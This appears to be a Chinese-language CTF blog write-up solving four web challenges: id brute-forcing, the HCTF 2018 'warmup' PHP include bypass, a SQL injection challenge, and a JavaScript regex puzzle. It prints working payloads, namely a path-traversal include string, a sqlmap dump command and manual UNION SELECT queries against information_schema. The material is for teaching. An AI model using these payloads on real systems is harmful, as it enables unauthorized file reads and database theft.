CTF_Web：攻防世界高手区进阶题WP（5-8）

持续更新ing

0x05 ics-06

题目描述：云平台报表中心收集了设备管理基础服务的数据，但是数据被删除了，只有一处留下了入侵者的痕迹。
打开题目发现只有报表管理可以点， 答案就应该在这里面，但查询也是假的，url中存在参数id，但没有注入，不管怎么输入都不会报错，换几个id号试试，发现都有返回，联系题目被藏在了某一处，爆破id号。
使用burp抓包进行id测试，生成1-10000的id号。

在id=2333中返回不同，且响应号为200。
找到flag。

0x06 warmup

题目描述：来源HCTF 2018
查看源码找到source.php，访问查看代码。

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

关键部分为if (! empty($_REQUEST['file']) && is_string($_REQUEST['file']) && emmm::checkFile($_REQUEST['file']))，可见只要传入的file参数不为空、是字符串、满足checkFile条件即可。
在checkFile中有几个重要函数需要我们关注：

in_array($page, $whitelist) '检测page中的内容是不是在白名单中'
mb_substr($page, 0,mb_strpos($page . '?', '?') '截取指定位置之前的内容'
mb_strpos($page . '?', '?') '返回第一次问号出现的位置'

也就是在问号之前有白名单内的文件名即可。
访问 index.php?file=hint.php得到提示。

在hint.php白名单基础上继续跨目录，使用?/隔开。

index.php?file=hint.php?/../../../../ffffllllaaaagggg访问得到flag。

0x07 NewsCenter

题目描述：如题目环境报错，稍等片刻刷新即可。

查询1与1'返回的页面不同，说明存在注入漏洞。
可以抓包保存成a.txt，直接使用 sqlmap -r a.txt -T secret_table -C fl4g --dump一把梭，得到结果。

也阔以手注检验自己的掌握情况。

首先使用order by X，判断字段数，这里4时返回错误，说明共3个字段。
1' union select 1,2,3 #，然后使用联合查询判断回显位置。

发现回显在后两个字段，替换不同词组，查询敏感信息即可。
' union select 1,2,TABLE_NAME from INFORMATION_SCHEMA.COLUMNS #查询所有表名。
' union select 1,2,column_name from information_schema.columns where table_name="secret_table" #查询对应表中的字段。
' union select 1,2,fl4g from secret_table#查询fl4g的值。

0x08 NaNNaNNaNNaN-Batman

题目描述：tinyctf-2014
给定的压缩包中是一个js源码，整理后为：

function $(){
var e=document.getElementById("c").value;
if(e.length==16)
    if(e.match(/^be0f23/)!=null)
        if(e.match(/233ac/)!=null)
            if(e.match(/e98aa$/)!=null)
                if(e.match(/c7be9/)!=null){
                    var t=["fl","s_a","i","e}"];
                    var n=["a","_h0l","n"];
                    var r=["g{","e","_0"];
                    var i=["it'","_","n"];
                    var s=[t,n,r,i];
                    for(var o=0;o<13;++o){
                        document.write(s[o%4][0]);s[o%4].splice(0,1)
                        }
                    }
                }
                document.write('<input id="c"><button οnclick=$()>Ok</button>');

可以发现当输入满足上面的正则且输入长度为16即可。
be0f23 233ac e98aa c7be9
现在的长度明显大于16了，需要将结果合并。
be0f233ac为9位
c7be98aa为8位，合并中间的c，刚好16位，输入be0f233ac7be98aa即可。